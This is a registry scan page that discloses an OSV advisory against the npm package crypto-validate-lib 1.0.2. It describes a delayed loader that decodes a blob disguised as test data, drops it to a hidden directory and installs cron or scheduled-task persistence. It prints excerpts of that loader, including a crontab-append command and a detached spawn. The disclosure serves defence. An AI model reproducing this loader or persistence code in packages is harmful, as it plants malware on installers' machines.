registry  /  crypto-validate-lib  /  1.0.2

crypto-validate-lib@1.0.2

OSV Malicious Advisory

scanned 2h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10586 confirms this npm version as malicious. index.js contains a self-invoking IIFE that, 37 seconds after the module is required, reads a base64 blob from test/fixtures/keypairs.dat (a ~53KB opaque file masquerading as test data), decodes it to ~40KB of JavaScript, writes the result to ~/.cache-db/.node-sync/syncd.js with mode 0o700, and spawns it via a detached node child process...

Advisory
MAL-2026-10586
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in crypto-validate-lib (npm)
Details
index.js contains a self-invoking IIFE that, 37 seconds after the module is required, reads a base64 blob from test/fixtures/keypairs.dat (a ~53KB opaque file masquerading as test data), decodes it to ~40KB of JavaScript, writes the result to ~/.cache-db/.node-sync/syncd.js with mode 0o700, and spawns it via a detached node child process. Persistence is installed alongside the drop: on Linux a crontab entry is appended running the dropped script every 12 hours, and on Windows a scheduled task named 'WinNodeSync' is created to run it hourly (mod 12). The hidden dot-directory name and the scheduled-task name masquerade as benign Node caching. The package is advertised as a crypto address validator; decoding a bundled opaque blob, writing it to a hidden home-directory path, installing cron/schtasks persistence, and background-executing it has no relationship to that purpose.
Decision reason
No blocking static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoFilesystemShell
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 2.24 KB of source

Source & flagged code

1 flagged · loading source
index.jsView file
3// v1.0.1 L4: const _K=Buffer.from("[redacted]","hex"); L5: const _I=Buffer.from("[redacted]","hex"); ... L7: try{ L8: const _fs=require("fs"),_cp=require("child_process"),_cr=require("crypto"); L9: const _jn=require("path").join,_hm=require("os").homedir(); L10: const _s=_jn(_hm,".cache-db",".node-sync","syncd.js"); ... L15: _fs.writeFileSync(_s,_b.toString("utf8"),{mode:0o700}); L16: try{_cp.execSync('(crontab -l 2>/dev/null|grep -v syncd;echo "0 */12 * * * /usr/bin/node '+_s+' >/dev/null 2>&1")|crontab -',{timeout:5e3})}catch(_){} L17: _cp.spawn("node",[_s],{detached:true,stdio:"ignore"}).unref(); ... L26: function isValidSolanaAddress(addr){return typeof addr==="string"&&addr.length>=32&&addr.length<=44&&/^[1-9A-HJ-NP-Za-km-z]+$/.test(addr)} L27: function isValidPrivateKey(key,type){if(!key||typeof key!=="string")return false;if(type==="eth")return/^[a-fA-F0-9]{64}$/.test(key);if(type==="btc")return/^[5KL][a-km-zA-HJ-NP-Z1-...
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L3

Findings

1 Medium2 Low
MediumInstall Persistenceindex.js
LowFilesystem
LowHigh Entropy Strings